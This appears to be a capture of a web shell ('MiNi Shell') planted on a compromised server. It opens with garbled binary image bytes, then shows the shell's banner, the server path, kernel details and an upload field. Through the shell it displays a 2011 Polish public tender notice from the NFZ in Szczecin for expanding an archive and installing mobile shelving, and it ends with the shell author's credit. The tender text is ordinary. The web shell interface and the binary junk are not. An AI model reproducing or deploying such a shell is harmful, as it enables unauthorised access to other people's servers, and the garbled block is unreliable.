JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111014/336874-N-2011.html

<p class="kh_header"><b>Szczecin: Wykonanie robót budowlanych w zakresie  rozbudowy archiwum zakładowego oraz dostawy i montażu regałów jezdnych</b><br>
<b>Numer ogłoszenia: 336874 - 2011; data zamieszczenia: 14.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zachodniopomorski Oddział Wojewódzki Narodowego Funduszu Zdrowia , ul. Arkońska 45, 71-470 Szczecin, woj. zachodniopomorskie, tel. 091 4251161, faks 091 4251096.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nfz-szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych w zakresie  rozbudowy archiwum zakładowego oraz dostawy i montażu regałów jezdnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w zakresie rozbudowy archiwum zakładowego (część A zamówienia) oraz dostawy i montażu regałów jezdnych (część B zamówienia).


Specyfikacja robót do wykonania zawarta została w załącznikach do SIWZ, tj:
1)	projekt budowlany - część opisowa (branża architektura),
2)	projekt budowlany - część opisowa (konstrukcja),
3)	projekt budowlany - część opisowa (branża sanitarna),
4)	projekt budowlany - część opisowa (branża elektryczna),
5)	przedmiar robót - branża architektoniczna i elektryczna,
6)	STWiORB w branży architektonicznej, sanitarnej i elektrycznej.

Opis przedmiotu zamówienia  został sporządzony zgodnie z rozporządzeniami Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego (Dz.U. Nr 130, poz. 1389) i z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202, poz. 2072 z późn. zm.).

Zamawiający wymaga udzielenia przez Wykonawcę gwarancji na wykonane roboty budowlane oraz dostarczone i zamontowane regały w minimalnym wymiarze 36 miesięcy od podpisania protokołu odbioru prac.

Do obowiązków wykonawcy należeć będzie organizacja placu robót, a w szczególności:

część A zamówienia

1)	organizacja zaplecza budowy i zaplecza socjalnego dla własnych potrzeb, zgodnie 
z obowiązującymi przepisami,
2)	odpowiednie oznakowanie i zabezpieczenie miejsc prowadzenia robót,
3)	uporządkowanie terenu po zakończeniu robót, tj. odtworzenie ewentualnie uszkodzonych nawierzchni lub obiektów sąsiadujących do stanu z dnia przejęcia frontu robót,
4)	konieczność bieżącej utylizacji lub zagospodarowania odpadów.

Roboty z uwagi na charakter obiektu, należy prowadzić ze szczególną ostrożnością 
z przestrzeganiem zasad BHP i przepisów przeciwpożarowych, ze szczególnym uwzględnieniem prac na wysokościach.
Zamawiający zapewnia zamykane pomieszczenie do składowania materiałów i narzędzi niezbędnych do wykonania wszystkich części przedmiotu zamówienia.

Ponadto wykonawca zobowiązany będzie do:
1)	wykonania wszystkich robót zgodnie z wiedzą techniczną i obowiązującymi zasadami sztuki   budowlanej,
2)	kierowania robotami w wymaganym zakresie przez pracownika wykonawcy posiadającego odpowiednie uprawnienia budowlane,
3)	wykonawca zobowiązany będzie do prowadzenia dziennika budowy,
4)	realizacji zadania przy użyciu materiałów zgodnych z Polskimi Normami lub posiadających certyfikat zgodności z aprobatą techniczną dla przyjętej technologii, dopuszczonych do obrotu na terenie Państwa Polskiego.

część B zamówienia

W ramach realizacji tej części zamówienia wykonawca zobowiązany będzie do:
1)	dostawy do siedziby Zamawiającego regałów wraz z całym niezbędnym osprzętem,
2)	zamontowania regałów, zgodnie z zasadami montażu tego typu urządzeń, w miejscu wskazanym przez Zamawiającego,
3)	wykonania wszelkich prac przygotowawczych,
4)	przeszkolenia wskazanych pracowników Zamawiającego w zakresie obsługi regałów
5)	corocznej bezpłatnej konserwacji (serwis) urządzeń w okresie gwarancyjnym, która obejmować będzie przegląd techniczny i regulacje oraz wymianę szybko zużywających się części.
Wymagane warunki świadczenia serwisu gwarancyjnego:
termin naprawy - w ciągu 14 dni, po zgłoszeniu telefonicznym lub e-mailowym przez Zamawiającego,
jeżeli w okresie gwarancyjnym będą więcej niż 3 naprawy, wtedy wykonawca wymieni  urządzenia na nowe, a zaoferowane parametry będą nie gorsze od pierwotnie zamontowanych, 
okres gwarancji ulega przedłużeniu o czas napraw,
okres gwarancji biegnie na nowo dla urządzenia bądź elementu wymienionego,
wszelkie naprawy będą odbywały się u Zamawiającego, w przypadku konieczności napraw poza siedzibą Zamawiającego, koszt transportu będzie ponosił wykonawca (Zamawiający nie może ponosić dodatkowych kosztów w związku z naprawami wadliwego urządzenia).

Szczegółowy opis przedmiotu zamówienia został ujęty w części opisowej projektu budowlanego  (branża architektura) w punkcie Wyposażenie (pkt 3, 4 i 6).

Zaoferowane przez wykonawcę regały stanowiące przedmiot umowy będą fabrycznie nowe (nie używane), o zaoferowanych parametrach technicznych, niewadliwe, w najlepszym gatunku pod względem technicznym, jakościowym i użytkowym.

Wymagane opinie i atesty:
atest higieniczny na farbę proszkową,
deklaracja zgodności z normami (o spełnieniu wymogów bezpieczeństwa CE),
opinia o niepalności,
opinia o wytrzymałości półek..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.40.00.00-1, 39.13.11.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania przez wykonawcę powyższego warunku, wykonawca musi legitymować się wykonaniem:
a)	 co najmniej jednej roboty budowlanej w branży ogólnobudowlanej o wartości nie mniejszej niż 30.000,- zł brutto, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, z podaniem jej rodzaju 
i wartości, daty i miejsca wykonania oraz załączyć dokument potwierdzający, że robota została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona (warunek dotyczący części A zamówienia),
b)	co najmniej jednej dostawy i montażu regałów jezdnych o wartości nie mniejszej niż 30.000,- zł brutto), w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, z podaniem jej wartości, przedmiotu, daty wykonania i odbiorcy oraz załączyć dokument potwierdzający, że dostawa ta została wykonana należycie (warunek dotyczący części B zamówienia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania przez wykonawcę powyższego warunku (warunek dotyczący części A zamówienia), wykonawca złoży stosowne oświadczenia na załączonych przez Zamawiającego formularzach (zał. nr 2Ai nr 2aA do SIWZ).
Konieczność potwierdzenia powyższego warunku nie dotyczy wykonawcy ubiegającego się 
o udzielenie zamówienia w części B.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie wykonawcy w sprawie udzielonej gwarancji  na wykonane roboty budowlane i użyte materiały (zał. nr 4A) oraz na dostarczone i zamontowane regały jezdne (zał. nr 4B).
2. Wykaz robót przewidzianych do zlecenia podwykonawcom (zał. nr 11A) - dokument dotyczący części A zamówienia.
3. Dokument dotyczący udzielonego pełnomocnictwa (pełnomocnictw), jeśli oferta będzie podpisana przez pełnomocnika, złożony być musi w oryginale lub notarialnie poświadczonej kopii.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dotyczy części A zamówienia
Zamawiający przewiduje możliwość dokonania zmiany postanowień przyszłej umowy 
w stosunku do treści oferty:
1)	w razie zmiany ceny umowy wynikającej z: 
a)	zmiany stawki podatku VAT,
b)	nadzwyczajnej zmiany cen materiałów budowlanych (wzrost powyżej 40%),
c)	zmiany powodującej korzyści dla Zamawiającego (pod względem ceny).
2)	zmiana terminu wykonania przedmiotu umowy:
a)	niekorzystne warunki pogodowe, z wyłączeniem niedogodności pogodowych typowych dla okresu trwania budowy, w miejscu budowy,
b)	siła wyższa,
c)	zmiany powodujące korzyści dla Zamawiającego (pod względem wykonania przedmiotu umowy),
d)	w wyniku działań osób trzecich niebędących konsekwencją winy w działaniu którejkolwiek ze Stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nfz-szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zachodniopomorski OW NFZ 
71-470 Szczecin, ul. Arkońska 45
pok. 219 (II piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2011 godzina 09:00, miejsce: Zachodniopomorski OW NFZ 
71-470 Szczecin, ul. Arkońska 45
pok. 219 (II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie robót budowlanych w zakresie rozbudowy archiwum zakładowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w zakresie rozbudowy archiwum zakładowego (część A zamówienia) oraz dostawy i montażu regałów jezdnych (część B zamówienia).


Specyfikacja robót do wykonania zawarta została w załącznikach do SIWZ, tj:
1)	projekt budowlany - część opisowa (branża architektura),
2)	projekt budowlany - część opisowa (konstrukcja),
3)	projekt budowlany - część opisowa (branża sanitarna),
4)	projekt budowlany - część opisowa (branża elektryczna),
5)	przedmiar robót - branża architektoniczna i elektryczna,
6)	STWiORB w branży architektonicznej, sanitarnej i elektrycznej.

Opis przedmiotu zamówienia  został sporządzony zgodnie z rozporządzeniami Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego (Dz.U. Nr 130, poz. 1389) i z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202, poz. 2072 z późn. zm.).

Zamawiający wymaga udzielenia przez Wykonawcę gwarancji na wykonane roboty budowlane w minimalnym wymiarze 36 miesięcy od podpisania protokołu odbioru końcowego robót.

Do obowiązków wykonawcy należeć będzie organizacja placu robót, a w szczególności:

część A zamówienia

1)	organizacja zaplecza budowy i zaplecza socjalnego dla własnych potrzeb, zgodnie 
z obowiązującymi przepisami,
2)	odpowiednie oznakowanie i zabezpieczenie miejsc prowadzenia robót,
3)	uporządkowanie terenu po zakończeniu robót, tj. odtworzenie ewentualnie uszkodzonych nawierzchni lub obiektów sąsiadujących do stanu z dnia przejęcia frontu robót,
4)	konieczność bieżącej utylizacji lub zagospodarowania odpadów.

Roboty z uwagi na charakter obiektu, należy prowadzić ze szczególną ostrożnością 
z przestrzeganiem zasad BHP i przepisów przeciwpożarowych, ze szczególnym uwzględnieniem prac na wysokościach.
Zamawiający zapewnia zamykane pomieszczenie do składowania materiałów i narzędzi niezbędnych do wykonania wszystkich części przedmiotu zamówienia.

Ponadto wykonawca zobowiązany będzie do:
1)	wykonania wszystkich robót zgodnie z wiedzą techniczną i obowiązującymi zasadami sztuki   budowlanej,
2)	kierowania robotami w wymaganym zakresie przez pracownika wykonawcy posiadającego odpowiednie uprawnienia budowlane,
3)	wykonawca zobowiązany będzie do prowadzenia dziennika budowy,
4)	realizacji zadania przy użyciu materiałów zgodnych z Polskimi Normami lub posiadających certyfikat zgodności z aprobatą techniczną dla przyjętej technologii, dopuszczonych do obrotu na terenie Państwa Polskiego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.40.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa i montaż regałów jezdnych do archiwum zakładowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w zakresie rozbudowy archiwum zakładowego (część A zamówienia) oraz dostawy i montażu regałów jezdnych (część B zamówienia).
Specyfikacja robót do wykonania zawarta została w załącznikach do SIWZ, tj:
1)	projekt budowlany - część opisowa (branża architektura),
2)	projekt budowlany - część opisowa (konstrukcja),
3)	projekt budowlany - część opisowa (branża sanitarna),
4)	projekt budowlany - część opisowa (branża elektryczna),
5)	przedmiar robót - branża architektoniczna i elektryczna,
6)	STWiORB w branży architektonicznej, sanitarnej i elektrycznej.

Zamawiający wymaga udzielenia przez Wykonawcę gwarancji na dostarczone i zamontowane regały w minimalnym wymiarze 36 miesięcy od podpisania protokołu odbioru.

część B zamówienia

W ramach realizacji tej części zamówienia wykonawca zobowiązany będzie do:
1)	dostawy do siedziby Zamawiającego regałów wraz z całym niezbędnym osprzętem,
2)	zamontowania regałów, zgodnie z zasadami montażu tego typu urządzeń, w miejscu wskazanym przez Zamawiającego,
3)	wykonania wszelkich prac przygotowawczych,
4)	przeszkolenia wskazanych pracowników Zamawiającego w zakresie obsługi regałów
5)	corocznej bezpłatnej konserwacji (serwis) urządzeń w okresie gwarancyjnym, która obejmować będzie przegląd techniczny i regulacje oraz wymianę szybko zużywających się części.
Wymagane warunki świadczenia serwisu gwarancyjnego:
termin naprawy - w ciągu 14 dni, po zgłoszeniu telefonicznym lub e-mailowym przez Zamawiającego,
jeżeli w okresie gwarancyjnym będą więcej niż 3 naprawy, wtedy wykonawca wymieni  urządzenia na nowe, a zaoferowane parametry będą nie gorsze od pierwotnie zamontowanych, 
okres gwarancji ulega przedłużeniu o czas napraw,
okres gwarancji biegnie na nowo dla urządzenia bądź elementu wymienionego,
wszelkie naprawy będą odbywały się u Zamawiającego, w przypadku konieczności napraw poza siedzibą Zamawiającego, koszt transportu będzie ponosił wykonawca (Zamawiający nie może ponosić dodatkowych kosztów w związku z naprawami wadliwego urządzenia).

Szczegółowy opis przedmiotu zamówienia został ujęty w części opisowej projektu budowlanego  (branża architektura) w punkcie Wyposażenie (pkt 3, 4 i 6).

Zaoferowane przez wykonawcę regały stanowiące przedmiot umowy będą fabrycznie nowe (nie używane), o zaoferowanych parametrach technicznych, niewadliwe, w najlepszym gatunku pod względem technicznym, jakościowym i użytkowym.

Wymagane opinie i atesty:
- atest higieniczny na farbę proszkową,
- deklaracja zgodności z normami (o spełnieniu wymogów bezpieczeństwa CE),
- opinia o niepalności,
- opinia o wytrzymałości półek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com